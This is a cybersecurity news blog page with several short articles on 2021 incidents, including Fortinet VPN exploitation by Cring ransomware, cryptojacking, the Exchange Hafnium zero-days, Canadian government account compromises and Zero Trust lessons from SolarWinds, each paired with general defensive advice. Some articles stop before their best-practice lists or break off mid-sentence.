Thought leadership. Threat analysis. Cybersecurity news and alerts.
Unpatched VPN Vulnerabilities: Attackers’ New Gateway to Gain Access to Victims’ Networks
A new report showed that ransomware attackers are using unpatched VPN vulnerabilities to gain access to victims’ networks.
Fortinet VPN Vulnerabilities
In the report “Vulnerability in FortiGate VPN servers is exploited in Cring ransomware attacks,” researchers at Kaspersky Lab found that the group behind the ransomware called “Cring” gained access to victims’ networks by exploiting CVE-2018-13379 – a known security vulnerability in Fortinet FortiOS under SSL VPN web portal that allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
According to researchers at Kaspersky Lab, CVE-2018-13379 vulnerability was used to extract the session file of the VPN Gateway. The session file contains valuable information, such as the username and plaintext password, the researchers said.
Researchers at Kaspersky Lab added that several days prior to the start of the main attack phase, the attackers performed test connections to the VPN Gateway. The attackers may have identified the vulnerable device themselves by scanning IP addresses, the researchers said, alternatively, they may have bought a ready-made list containing IP addresses of vulnerable Fortinet VPN Gateway devices as an offer to buy a database of vulnerable Fortinet VPN Gateway devices appeared on a dark web forum in autumn of 2020.
In a joint advisory "APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks," the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) reported that in March 2021 they observed threat actors scanning the internet for Fortinet VPN Gateway devices that didn’t apply the security patches to security vulnerabilities CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591. Fortinet, for its part, had issued a security patch for each of the said three security vulnerabilities.
CVE-2020-12812 is a security vulnerability in Fortinet VPN devices that can allow threat actors to log in successfully without being prompted for the second factor of authentication if they changed the case of their username. CVE-2019-5591, meanwhile, is a security vulnerability in Fortinet VPN Gateway devices that can allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.
“The APT actors may be using any or all of these CVEs to gain access to networks across multiple critical infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,” FBI and CISA said.
Typical of ransomware, Cring encrypts victims’ files and demands from victims to pay a certain amount (payable in bitcoin) in exchange for the decryption keys that would unlock the encrypted files.
Swisscom’s CSIRT and Kaspersky Lab reported that in the case of Cring ransomware attacks, after the attackers gained access to victims’ networks, they dropped into the victims’ networks customized Mimikatz and followed by CobaltStrike. Mimikatz is an open-source software that allows users to view and save authentication credentials.
CobaltStrike, meanwhile, refers to commercial penetration testing toolkits usually used by security researchers. Malicious software (malware) developers, meanwhile, have cracked and abused CobaltStrike for malicious purposes.
According to researchers at Kaspersky Lab, after Cring ransomware attackers gained access into the victim’s network by exploiting CVE-2018-13379, the attackers then dropped Mimikatz into the compromised system. The researchers said Mimikatz was used to steal the account credentials of Windows users who had previously logged in to the compromised system. With the help of Mimikatz, the attackers were able to compromise the domain administrator account.
After compromising the domain administrator account, the researchers said, Cring ransomware attackers distributed malware to other systems on the organization’s network through the use of Cobalt Strike. The Cobalt Strike Beacon backdoor, researchers at Kaspersky Lab said, provided the attackers with remote control of the infected system.
Cybersecurity Best Practices
Here are some of the best practices in order to prevent Cring ransomware attacks and ransomware attacks in general:
Keep all software up to date
The group behind Cring ransomware exploited the fact that despite the availability of a security patch for CVE-2018-13379, many users have delayed the application of this security patch. If your organization has delayed the application of the security patch for CVE-2018-13379, assume that your organization’s network has already been compromised.
Implement the principle of least privilege
Change the active directory policy in line with the principle of least privilege – a security best practice that requires limiting privileges to the minimum necessary to perform a job. An active directory policy that’s in line with the principle of least privilege only allows users to log in only to those systems needed to perform a function.
Practice Network Segmentation
Network segmentation refers to the practice of subdividing your organization’s network into sub-networks so that in case one sub-network is compromised, the other sub-networks won’t be affected. Restrict VPN access between sub-networks.
What Is Cryptomining Attack and How to Prevent Such Attack
The price of Bitcoin, the recognized leader among thousands of cryptocurrencies, has skyrocketed from $100 in 2013 to nearly $60,000 in March 2021.
The dizzying rise, not just by Bitcoin but by other cryptocurrencies as well, gives rise to the cyberattack known as “cryptomining attack.”
What Is Cryptomining Attack?
In cryptomining, also known as cryptojacking, an attacker uses the computing power of others, without the knowledge and permission from the owners of the computing power.
Bitcoin and other cryptocurrencies are virtual currencies. They only exist online and they’ve no physical notes or coins.
If done with the knowledge and permission of the computing power owner, cryptomining is legal. It’s important to note, however, that some countries ban cryptomining and cryptocurrency in general.
Many cryptocurrencies use cryptomining – the use of the processing power of computers to solve complex mathematical problems and verify cryptocurrency transactions. Crypto miners, meanwhile, are rewarded a certain amount of cryptocurrency for the use of computing power.
Cryptomining can be done on physical computers and via cloud computing. With physical computers, cryptomining attacks can easily be detected through a noticeable slowdown in device performance, reduction in productivity of the device, and unexpected increases in electricity costs.
With cloud-based cryptomining attacks, threat actors can illicitly use cloud computing resources for a long time without detection. Typically, cloud-based cryptomining attacks are only discovered when the victim finds an inflated cloud usage bill.
Prevalence of Cryptomining Attacks
Cryptomining attacks have been around for years. The noticeable uptick of cryptomining attacks happened in 2017 when the Bitcoin price reached $20,000.
Internet Exposed Kubernetes Pods
In February 2018, researchers at RedLock reported that Tesla fell victim to cryptomining attack. “The hackers had infiltrated Tesla’s Kubernetes console which was not password protected,” RedLock researchers said. “Within one Kubernetes pod, access credentials were exposed to Tesla’s AWS environment which contained an Amazon S3 (Amazon Simple Storage Service) bucket that had sensitive data such as telemetry. In addition to the data exposure, hackers were performing crypto mining from within one of Tesla’s Kubernetes pods.”
The cryptocurrency that was mined using Tesla’s computing resources was Monero. To date, the price of Monero is $261.57.
QNAP NAS Vulnerabilities
Researchers at 360 Netlab reported that on March 2, 2021, they detected attacks targeting QNAP NAS devices via the unauthorized remote command execution vulnerabilities, specifically CVE-2020-2506 and CVE-2020-2507.
CVE-2020-2506 is a security vulnerability in the QNAP NAS device that allows attackers to compromise the device’s software security, allowing the attackers to gain privileges, or reading sensitive information. CVE-2020-2507, meanwhile, is a command injection vulnerability in the QNAP NAS device that can allow remote attackers to run arbitrary commands.
Successful exploitation of CVE-2020-2506 and CVE-2020-2507, researchers at 360 Netlab said, allowed the attacker to gain root privilege on the devices and perform cryptomining attacks. Researchers at 360 Netlab named the malicious software (malware) that exploits CVE-2020-2506 and CVE-2020-2507 in QNAP NAS devices and conduct cryptomining activities on these devices as “UnityMiner.”
UnityMiner, 360 Netlab researchers said, allows the attackers to hide the illicit cryptomining process and the real CPU memory resource usage information. With UnityMiner, the researchers said, QNAP users who check the system usage via the WEB management interface cannot see the abnormal system behavior.
In January 2021, Imperva researchers reported a botnet in which one of its primary activities was performing cryptomining attacks.
Botnet, also known as zombie army, is a group of hijacked internet-connected computers each injected with malware and controlled from a remote location by an attacker to perform malicious activities such as cryptomining. According to Imperva researchers, the malware that they discovered exploited the security vulnerability designated as CVE-2021-3007.
The CVE-2021-3007 vulnerability has two opposing claims: one claim is that this is a Zend Framework vulnerability that can lead to remote code execution; the other claim, meanwhile, is that this is a "vulnerability in the PHP language itself."
According to Imperva researchers, successful exploitation of CVE-2021-3007 allows the attackers to run XMRig – a legitimate open-source software that utilizes system CPUs to mine the cryptocurrency Monero. Cybercriminals, however, abuse XMRig to earn cryptomining revenue by launching cryptomining attacks on victims’ computing resources.
In the case of a botnet, once a victim’s computer is enslaved as one of the zombie armies and injected with malware and controlled from a remote location by an attacker to perform malicious activities, there’s no limit to what the attacker can do. In addition to illicit cryptomining, your organization’s computers could be used for other malicious activities such as distributed denial-of-service (DDoS) attacks.
Best Practices to Prevent Cryptomining Attacks
Here are some of the best practices in order to prevent threat actors from using your organization’s computing power for illicit cryptomining:
Sierra Wireless Becomes Latest Ransomware Attack Victim
Sierra Wireless, one of the world’s leading IoT solutions providers, recently announced it was a victim of a ransomware attack.
Last March 23rd, Sierra Wireless announced that it discovered on March 20, 2021, it was hit by a ransomware attack.
In a ransomware attack, computer files are encrypted, blocking a victim from accessing these files. A ransomware attacker then demands from the victim to pay a specified amount in exchange for the decryption key that would unlock the encrypted files.
In recent months, it has become a trend among ransomware attackers to demand from ransomware victims a second ransom demand in exchange for the non-publication of data stolen during the ransomware attack. In the case of the ransomware attack on Sierra Wireless, it wasn’t disclosed whether or not the attacker or attackers demanded the second ransom or whether or not the company paid ransom.
As a result of the ransomware attack, Sierra Wireless said it halted production at its manufacturing sites. The company added that its corporate website and other internal operations have also been disrupted by the ransomware attack.
As a result of the ransomware attack, Sierra Wireless said it was withdrawing its First Quarter 2021 guidance. In February 2021, the company released its 2020 full year revenue and First Quarter 2021 guidance.
Sierra Wireless reported that its total revenue reached $448.6 million in 2020. For the First Quarter of 2021, the company said it projected to earn $109.9 million. In its March 26th update about the ransomware attack, Sierra Wireless said it has resumed production and started to recover its internal systems.
“Sierra Wireless maintains a clear separation between its internal IT systems and its customer-facing products and services,” the company said. “Sierra Wireless believes that the impact of the attack was limited to Sierra Wireless’ internal systems and corporate website, and that its products and connectivity services were not impacted, and its customers’ products and systems were not breached during the attack.”
The company added that it doesn’t expect that there will be any product security patches, or firmware or software updates required as a result of the ransomware attack.
Prevalence of Ransomware Attacks
IBM reported that ransomware was the cause of nearly one in four real-life cyberattacks worldwide that the company responded to in 2020. IBM added that ransomware attacks in 2020 were “aggressively evolving to include double extortion tactics.”
According to IBM, the group behind the ransomware called “Sodinokibi” – the most commonly observed ransomware group in 2020 – earned over $123 million in 2020, with nearly two-thirds of its victims paying a ransom. IBM added that the group behind Sodinokibi stole from victims approximately 21.6 terabytes of data and approximately 43% of ransomware victims had their data leaked for the public to see.
IBM further reported that Sodinokibi and the other successful ransomware groups in 2020 were focused on stealing and publishing the data of victims who refused to pay ransom.
IBM added that the most successful ransomware groups in 2020 were focused on creating ransomware-as-a-service cartels. In ransomware-as-a-service, one group maintains the ransomware code and another group, known as affiliates, spread the ransomware. Affiliates are known to distribute ransomware in any way they like.
In the blog post “McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us,” McAfee Labs reported that while Sodinokibi ransomware affiliates used different modus operandi, it did notice many started with a breach of Remote Desktop Protocol (RDP) – a proprietary protocol developed by Microsoft that allows Windows users to remotely connect to another Windows computer.
RDP servers that are exposed to the internet through the use of weak passwords and unprotected by multi-factor authentication (MFA), virtual private networks (VPNs), and other security protections, are of particular interest to cyberattackers. RDP is often breached via brute force attacks, in which the attacker submits many username and password combinations in the hope of guessing the correct combination.
“Through RDP brute force, threat actor groups can gain access to target machines and conduct many follow-on activities like ransomware and coin mining operations,” Microsoft Defender Security Research Team said in the blog post "Data science for cybersecurity: A probabilistic time series model for detecting RDP inbound brute force attacks."
Cybersecurity Best Practices Against Ransomware
Network segmentation is one of the cybersecurity best practices in protecting your organization’s network from ransomware. In network segmentation, your organization’s IT network is divided into sub-networks so that in case something bad happens to one sub-network, the other sub-networks won’t be affected. In the case of Sierra Wireless ransomware attack, the company said it maintains a clear separation between its internal IT systems and its customer-facing products and services.
It’s also important to backup your organization’s critical data regularly, following the 3-2-1 backup rule. In 3-2-1 backup rule, 3 copies of your organization’s critical data are kept, with copies stored on 2 different media, and one of these copies must be kept offsite for disaster recovery.
As mentioned, one of the favorite entry points of ransomware attackers into their victims’ networks is via RDP servers exposed to the internet. Protect RDP servers via strong passwords, MFA, VPN, and other security protections.
Is Network-Level Blocking the Right Solution to Limiting Botnet Traffic?
The Government of Canada, through the Canadian Radio-television and Telecommunications Commission, recently called on stakeholders to comment on its proposal to develop a network-level blocking framework that will limit the harm botnets cause to Canadians.
In the "Call for comments – Development of a network-level blocking framework to limit botnet traffic and strengthen Canadians’ online safety," the Commission said it’s the principal enforcement agency for the Personal Information Protection and Electronic Documents Act and the Telecommunications Act – Canada’s Anti-Spam Legislation, also known as CASL. “Botnet activity is by definition a CASL violation, as is the botnet itself,” the Commission said. “One way that TSPs [telecommunications service providers] can limit anti-CASL behaviour is by blocking botnet traffic.”
What Are Botnets?
Botnets are networks of hijacked computers that are infected by malicious software (malware). One way by which this malware arrives on the hijacked computer is through phishing – a type of cyberattack in which the attacker masquerades as a trusted entity and tricks an email receiver to click on a malicious attachment or link.
Clicking this malicious attachment or link could lead to the downloading and running of malware on the email recipient’s computer. Once the malware is inside the victim’s computer, it contacts the attacker’s command and control center, allowing the attacker to control the malware-infected computer and using it to commit cybercrimes such as further phishing campaigns, credential stuffing, ransomware, or distributed denial-of-service (DDoS).
According to Commission, botnets are the basis for an increasingly large proportion of cyber threats to individuals, corporations, and institutions in Canada.
In mid-March this year, Canada Revenue Agency (CRA) announced that it locked out 800,000 CRA user IDs and passwords as they may have been obtained by unauthorized third parties or have been identified as being available to unauthorized individuals.
CRA said, “We wish to reiterate that these user IDs and passwords were not compromised as a result of a breach of CRA’s online systems, rather they may have been obtained by unauthorized third parties and through a variety of means by sources external to the CRA, such as email phishing schemes or third party data breaches.”
In August 2020, the Government of Canada, through the Treasury Board of Canada Secretariat, reported that attackers fraudulently accessed nearly 5,500 CRA accounts. In a press conference in August 2020, Marc Brouillard, acting Chief Technology Officer for the Treasury Board of Canada Secretariat said that at one point, the CRA web portal was attacked by a large amount of traffic using a "botnet to attempt to attack the services through credential stuffing".
Credential stuffing, also known as account takeover, uses a large number of stolen username and password combinations from other websites and tests these stolen credentials to login to a target website. Credential stuffing are launched through botnets and across different IP addresses.
Network-Level Blocking Framework Proposal
The Commission proposes that telecommunications service providers can introduce network-level blocking using a variety of techniques such as domain-based blocking, Internet Protocol (IP)-based blocking, and protocol-based blocking.
“Internet users access websites by clicking on links or by entering domains (www.example.com) into a browser,” Commission said. “To access a webpage, the domain has to first be translated into the IP address of the server that hosts the webpage. This translation happens through the Domain Name System (DNS), which maps domain names to IP addresses. Once the IP address is found, the Internet user’s device can then route communication to the website’s server and download the webpage.”
In domain-based blocking when an infected device requests a blocklisted command and control domain, the DNS will either reply that the domain is unknown or will redirect the user to a site stating that the requested domain isn’t permitted.
In IP-based blocking, a firewall is used to prevent communication to the IP addresses of suspected command and control servers while letting other communication through. Protocol-based blocking, meanwhile, refers to a targeted form of IP-based blocking limited to a select group of services on a specified server.
In its reply to the network-level blocking framework proposal, the Royal Canadian Mounted Police (RCMP) said it supports the Commission’s proposal as “criminal botnet operations and infrastructure continues to underpin various cybercrime threats, such as ransomware, Distributed Denial of Service (DDoS) attacks, campaign-level phishing activities, among other cyber intrusions.”
RCMP said that in 2016, it took part in a global effort to dismantle the network called “Avalanche,” which included a botnet infrastructure that facilitated the widespread malware attacks targeting financial institutions and other sectors. RCMP said that the dismantlement of the Avalanche network, which spread across 30 countries, resulted in multiple arrests, seizures of command and control server infrastructure, and over 800,000 domains were seized, sinkholed, or blocked.
In response to the Commission’s proposal, Bell Canada said, “There is no one-size-fits-all detection and mitigation method.” It added that once the Commission approves one type of blocking “malicious actors can be expected to change their techniques and implement new botnet strategies to evade the regulated mandatory form of blocking.”
In response to the Commission’s proposal, Rogers Communications said, “Blocking of botnet traffic is a highly technical matter that requires in-depth security intelligence.” It added that the “proposal for a single network blocking framework is not the best approach to tackle cyber crime.”
Telus Communications, for its part, said, “The Commission’s proposal to focus on TSPs in an effort to limit botnets is a narrow approach that, absent other stakeholder action, will be ineffective.” It added that network-level blocking is a “reactive measure – it is not implemented until malicious traffic is detected from an already
Canada Revenue Agency (CRA) Locks Out 800,000 Accounts
The Canada Revenue Agency (CRA) recently revoked 800,000 CRA user IDs and passwords. According to the CRA, the IDs and passwords “may have been obtained by unauthorized third parties” or “have been identified as being available to unauthorized individuals.”
“Out of an abundance of caution, and to prevent unauthorized access to these accounts, the CRA took swift action to lock these accounts,” CRA said in a statement. “The total number of accounts impacted is roughly 800 thousand.”
The Agency said the revocation of the hundreds of thousands of CRA user IDs and passwords wasn’t a result of a breach of CRA’s online systems. The Agency attributed the cause of the revocation to external causes, including email phishing schemes or third-party data breaches. “We wish to reiterate that these user IDs and passwords were not compromised as a result of a breach of CRA’s online systems, rather they may have been obtained by unauthorized third parties and through a variety of means by sources external to the CRA, such as email phishing schemes or third party data breaches,” CRA said.
Past Data Breach
In August 2020, the Government of Canada, through the Treasury Board of Canada Secretariat, issued a statement about the data breach on the Canadian Government's GCKey – a system used by 30 Canadian federal departments as a single sign-on (SSO) system to access government services. GCKey is particularly used to access the CRA accounts.
According to the Treasury Board of Canada Secretariat, out of the nearly 12 million active GCKey accounts in Canada, the passwords and usernames of 9,041 users were acquired fraudulently and used to access government services. The Treasury Board of Canada Secretariat added that out of the total number of accounts fraudulently accessed by the attackers, nearly 5,500 CRA accounts were fraudulently accessed.
Tests conducted by BleepingComputer on CRA’s web portal showed that multi-factor authentication and security CAPTCHA (short for Completely Automated Public Turing Test To Tell Computers and Humans Apart in use) weren't enabled. "When signing-in from a new computer, the user would be asked a security question (e.g. pet's name), however, there is no mechanism prompting the user for a 2FA code, for example, to be sent via a text message (SMS)," BleepingComputer said.
In a press conference in August 2020, Marc Brouillard, acting Chief Technology Officer for the Treasury Board of Canada Secretariat said that at one point, the CRA web portal was attacked by a large amount of traffic using a "botnet to attempt to attack the services through credential stuffing". Brouillard said the attackers bypassed the CRA security questions and fraudulently access CRA accounts by exploiting a vulnerability in the configuration of security software solutions that the Government of Canada used.
The acting Chief Technology Officer for the Treasury Board of Canada Secretariat mentioned three methods of attacks used by the attackers in the 2020 CRA web portal data breach: botnet, credential stuffing, and exploitation of a software security vulnerability. The recent cyber incident at the CRA, meanwhile, was attributed to email phishing schemes or third-party data breaches.
Botnet, also known as zombie army, is a cyberattack that uses a group of hijacked computers (including IoT devices), each injected with malicious software (malware) and controlled by the attacker from a remote location without the knowledge of the computer's owner.
Credential stuffing is a cyberattack in which an attacker uses a large number of stolen username and password combinations from other websites and tests these stolen credentials to login to other websites. This type of attack is based on the assumption that username and password combinations are typically reused. To scale the process of testing these stolen credentials from one website to another website, botnets are used to automate the process.
Exploitation of Software Security Vulnerability
In the exploitation of software security vulnerability, an attacker exploits either a publicly known software security vulnerability or a security vulnerability that’s only known to the attacker. In most cases, attackers exploit known security vulnerabilities and those with available fix, also known as a patch, as attackers assume that users delay the application of the available patch.
Email phishing is a type of cyberattack in which the attacker masquerades as a trusted entity, and tricks the victim into opening an email. The email recipient is further tricked into opening a malicious attachment or link, which can lead to the installation of malware on the email recipient’s computer, enabling the attacker to conduct malicious activities on the email recipient’s computer. Activities could include stealing of sensitive information.
Third-Party Data Breaches
Third-party data breach, also known as supply chain attack, is a type of cyberattack in which an attacker infiltrates the systems of the initial victim with the end goal of infiltrating the customers of the initial victim.
Cybersecurity Best Practices
As exemplified in the August 2020 data breach at the CRA and the recent cyber incident at the CRA, attackers are employing not just one but multiple attack methods in order to compromise their target. Below are some of the best practices in order protect your organization from the above-mentioned cyberattack methods:
Patch Time: Microsoft Issues Patches for Exchange Server Zero-Day Threats
Microsoft recently issued out-of-band security updates for zero-day vulnerabilities affecting Microsoft Exchange Server.
Out-of-band security updates refer to security updates released outside the normal release time. Zero-day vulnerabilities, meanwhile, refer to software security vulnerabilities that are exploited before updates become available.
Microsoft Exchange Server is Microsoft's email server solution that’s available both on-premise and online. This email server solution runs exclusively on Windows Server operating systems. Exchange servers are primarily used by organizations. As such these Exchange servers are high-value targets.
In the blog post "HAFNIUM targeting Exchange Servers with 0-day exploits," Microsoft Threat Intelligence Center, Microsoft 365 Defender Threat Intelligence Team, and Microsoft 365 Security said that on-premises Exchange servers are affected by the zero-day vulnerabilities, while Exchange online isn’t affected. On-premises Exchange servers that are specifically affected are Exchange Server 2010, Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019.
Microsoft Exchange Server Zero-Day Vulnerabilities
According to Microsoft Threat Intelligence Center, Microsoft 365 Defender Threat Intelligence Team, and Microsoft 365 Security, the threat actor, collectively called “Hafnium,” used the following zero-day vulnerabilities in on-premises Exchange servers to initially access their victims’ networks:
CVE-2021-26855: A server-side request forgery (SSRF) vulnerability in on-premises Exchange servers that allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
CVE-2021-26857: This vulnerability allowed the attacker to run code as SYSTEM on the Exchange server. This vulnerability, however, needs administrator permission or another vulnerability to exploit.
CVE-2021-26858: After exploiting CVE-2021-26855 or by compromising a legitimate admin’s credentials, this vulnerability allowed the attacker to write a file to any path on the server.
CVE-2021-27065: Similar to CVE-2021-26858, after exploiting CVE-2021-26855 or by compromising a legitimate admin’s credentials, this vulnerability allowed the attacker to write a file to any path on the server.
“After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server,” Microsoft Threat Intelligence Center, Microsoft 365 Defender Threat Intelligence Team, and Microsoft 365 Security said. “Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise.”
By exploiting these 4 zero-day vulnerabilities, the attacker was able to bypass authentication, including two-factor authentication. These vulnerabilities allowed the attacker to access email accounts that are of interest within the targeted organizations and allowed the attacker to remotely execute code on vulnerable Microsoft Exchange servers.
Researchers from Volexity and Dubex were credited by Microsoft for reporting about the zero-day vulnerabilities in on-premises Exchange servers. Security researchers at Volexity and Dubex reported that the zero-day exploits in on-premises Exchange servers started as early as January 2021.
Security researchers at Volexity reported that in January 2021 they detected anomalous activity from two of its customers’ Microsoft Exchange servers. The Volexity security researchers said they identified a large amount of data being sent to IP addresses it believed weren’t tied to legitimate users.
Dubex security researchers said they observed the zero-day exploit in a set of Exchange servers in Denmark. They particularly observed CVE-2021-26857, an insecure deserialization vulnerability in the Unified Messaging service. “Through analysis of the systems, Dubex Incident Response Team determined that feeding the UM [Unified Messaging] Server with a sufficiently malformed voicemail file caused it to spawn a UMWorkerProcess that deserialised the voicemail and executed contents,” Dubex security researchers said.
In the blog post "New nation-state cyberattacks," Tom Burt, Corporate Vice President, Customer Security & Trust at Microsoft, said that Hafnium, the group behind the zero-day exploits in on-premises Exchange servers, operates from China. Hafnium, he said, targets research organizations, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.
Burt added Hafnium attacked by following these three steps: “First, it would gain access to an Exchange Server either with stolen passwords or by using the previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it would create what’s called a web shell to control the compromised server remotely. Third, it would use that remote access – run from the U.S.-based private servers – to steal data from an organization’s network.”
Preventive and Mitigating Measures
According to Microsoft, zero-day vulnerabilities in on-premises Exchange servers, which include CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, are all part of an attack chain. The initial attack, Microsoft said, requires the ability to make an untrusted connection to Exchange server port 443.
To prevent the initial attack, Microsoft recommends protection against untrusted connection to Exchange server port 443. To separate the Exchange server from external access,
Microsoft recommends setting up a virtual private network (VPN).
Microsoft, however, noted that protection against untrusted connection to Exchange server port 443 and setting up a VPN only serve as protection against the initial portion of the attack. The company warned that other portions of the attack chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file.
If the latest security updates can't be immediately deployed, it’s recommended to restrict external access to OWA URL, restrict external access to Exchange Admin Center (EAC), and disconnect vulnerable Exchange servers from the internet until the latest security updates can be applied.
Microsoft recommends the following best practices to better defend on-premises Exchange servers:
1 in 4 Cyberattacks in 2020 Caused by Ransomware, IBM Report Shows
IBM’s latest report, X-Force Threat Intelligence Index 2021, found 1 in 4 real cyberattacks worldwide in 2020 was caused by ransomware.
Double Extortion Tactic
Ransomware is a malicious software (malware) that encrypts victims’ computer files. File encryption prevents legitimate users from assessing their files. Ransomware attackers are publicly coming out that they’re also stealing victims’ data prior to encrypting these files.
IBM's X-Force Threat Intelligence Index 2021, which the company said is based on billions of data points collected from its customers and public sources between January and December 2020, showed that a number of the ransomware attacks in 2020 involved double extortion – a tactic in which the attackers demand ransom two ransoms. Aside from demanding from victims to pay ransom in exchange for the decryption key that would unlock the encrypted files, attackers also demand a second ransom payment, this time, as payment to stop the attackers from selling or auctioning the victims’ stolen files.
According to IBM, in 2020, 36% of the data breaches that X-Force (IBM’s cloud-based threat intelligence platform) tracked came from ransomware attacks that also involved alleged data theft, suggesting that “data breaches and ransomware attacks are beginning to collide.”
According to IBM, Sodinokibi, also known as REvil, was the most active ransomware in 2020, accounting for 22% of all ransomware incidents.
IBM estimated that the group behind the Sodinokibi ransomware earned at least $123 million in 2020 and stole about 21.6 terabytes of data from victims. IBM added that nearly two-thirds of the victims of Sodinokibi paid ransom, and nearly 43% had their stolen data leaked to the public.
Sodinokibi was first observed in the wild in April 2019. When it first came out, Sodinokibi was observed spreading itself by exploiting a vulnerability in Oracle’s WebLogic server.
According to IBM, Sodinokibi and other successful ransomware groups in 2020 were focused on stealing and leaking data, as well as creating ransomware-as-a-service cartels.
One of the reasons behind the notoriety and the resulting success of ransomware groups is that these groups operate in what is known as ransomware-as-a-service. In ransomware-as-a-service, one group maintains the ransomware code and another group, known as affiliates, spreads the ransomware.
Affiliates in ransomware-as-a-service are allowed to spread the ransomware in any way they like. In the blog post "McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us," McAfee Labs found that some affiliates prefer mass-spread attacks, while other affiliates adopt a more targeted approach.
Examples of mass-spread attacks are phishing and exploit kits. Phishing is the fraudulent way of obtaining sensitive information such as passwords and credit card details by impersonating a trusted individual or entity. Exploit kits, meanwhile, refer to threats that use automated tools to scan for vulnerable browser-based applications, compromised sites to divert web traffic, and run malware.
Cyberattacks that employ a targeted approach, meanwhile, refer to attacks targeting specific individuals or specific entities. Examples of targeted approaches include brute-forcing Remote Desktop Protocol (RDP) access.
RDP is a proprietary protocol developed by Microsoft that allows a Windows-based user to connect to a remote Windows personal computer or server over the internet. After brute-forcing RDP access, attackers then upload tools in order to gain more rights and run the ransomware inside the internal network of a victim.
“We have investigated several campaigns spreading Sodinokibi, most of which had different modus operandi but we did notice many started with a breach of an RDP server,” McAfee Labs said.
Cost of a Ransomware Attack
In its latest report, Universal Health Services said the company incurred $67 million as a result of an “Information Technology Incident” that occurred from September 27, 2020 up to October 2020.
TechCrunch reported the Universal Health Services information technology incident as ransomware attack. BleepingComputer, meanwhile, reported that the specific name of the ransomware behind the Universal Health Services information technology incident is Ryuk – a ransomware first discovered in the wild in August 2018.
Universal Health Services said there’s no evidence of unauthorized access, copying, or misuse of any patient or employee data.
“Given the disruption to the standard operating procedures at our facilities during the period of September 27, 2020 into October, 2020, certain patient activity, including ambulance traffic and elective/scheduled procedures at our acute care hospitals, were diverted to competitor facilities,” Universal Health Services said. “We also incurred significant incremental labor expense, both internal and external, to restore information technology operations as expeditiously as possible. Additionally, certain administrative functions such as coding and billing were delayed into December, 2020, which had a negative impact on our operating cash flows during the fourth quarter of 2020.”
Security researchers aren’t certain about the infection vector of Ryuk ransomware. It’s suspected that this ransomware uses the targeted attack approach by brute-forcing RDP access and malicious use of Cobalt Strike.
Cobalt Strike is a commercial penetration testing tool that markets itself as "adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors." This commercial penetration testing tool uses tools such as Mimikatz – a tool that’s capable of obtaining plaintext Windows account logins and passwords.
Cybersecurity Best Practices Against Ransomware Attacks
Below are some of the cybersecurity best practices against ransomware attacks:
Zero Trust Lesson
Zero Trust is one of the lessons learned as a result of the recent SolarWinds supply chain attack, according to Microsoft – one of the victims of the said supply chain attack.
In the blog post "Microsoft Internal Solorigate Investigation – Final Update” published on February 18, 2021, Microsoft Security Response Center (MSRC) Team admitted that the threat actor behind the SolarWinds supply chain attack was able to download a small subset of Azure components (subsets of service, security, identity), a small subset of Exchange components, and a small subset of Intune components.
SolarWinds Supply Chain Attack Background
In December 2020, SolarWinds reported to the U.S. Securities and Exchange Commission (SEC) that the supply chain attack on its system affected nearly 18,000 customers of SolarWinds Orion – a software used as a monitoring and management platform designed to simplify IT administration.
In a supply chain attack, an attacker accesses the source code of legitimate software and infects it with malicious code. Once this compromised software is distributed to customers, the customers' systems are compromised as well and a series of compromises follow. According to SolarWinds, the attacker inserted a malicious code within Orion which, if present and activated, "could potentially allow an attacker to compromise the server on which the Orion products run." Microsoft named this malicious code "Solorigate."
Last December, Microsoft, through the MSRC Team, admitted that it was one of the victims of the SolarWinds supply chain attack and the threat actor behind it was able to "view source code in a number of source code repositories." The December 2020 admission specified that the threat actor was able to view, while the latest February 2021 admission specified that the threat actor was able to download.
"We have now completed our internal investigation into the activity of the actor and want to share our findings, which confirm that we found no evidence of access to production services or customer data," MSRC Team said, in the latest report dubbed as the final update about Solorigate. "The investigation also found no indications that our systems at Microsoft were used to attack others."
The MSRC Team said that Solorigate reinforced one key learning: Zero Trust.
The concept of Zero Trust has been around for nearly a decade. The term was first used in 2010 by John Kindervag, then the principal analyst at Forrester Research Inc. In his research and analysis of enterprises, Kindervag found that “trust” had become an essential part of the network. For Kindervag, trust is a major liability for enterprises’ networks that could result in failure over and over again in the years to come.
In the blog post "The Tao Of Zero Trust" Chase Cunningham, VP, Principal Analyst; Jeff Pollard, VP, Principal Analyst; and Stephanie Balaouras, VP, Group Director, all from Forrester Research said that the adoption of Zero Trust is based on these two factors:
"First, the cybersecurity industry has hit an inflection point wherein the massive spend to prove the negative of ‘good security’ is drying up.
"Second, CEOs and board leadership for enterprises are tired of the technical talk and miscommunication around cybersecurity operations. Zero Trust is simple in name, comprehensive in its approach, and realistic in the acceptance of the inherent failures that plague enterprises from the second they start sending electrons."
MSRC Team defined Zero Trust as a "transition from implicit trust –assuming that everything inside a corporate network is safe – to the model that assumes breach and explicitly verifies the security status of identity, endpoint, network, and other resources based on all available signals and data."
Verify explicitly, least privileged access, and assume breach are three principles of Zero Trust. Verify explicitly means that it's always important to authenticate and authorize based on all available data points. Least privileged access means that permissions are only granted to the appropriate environment and on appropriate devices to meet specific business goals. Assume breach, meanwhile, means that processes and systems must assume breach has already happened or soon will.
In the blog post "Using Zero Trust principles to protect against sophisticated attacks like Solorigate," Alex Weinert, Identity Security Director at Microsoft, said that the threat actor behind Solorigate compromised identity environments with these three major vectors: compromised user accounts, compromised vendor accounts, and compromised vendor software. "In each of these cases, we can clearly see where the attacker exploited gaps in explicit verification," Weinertsaid.
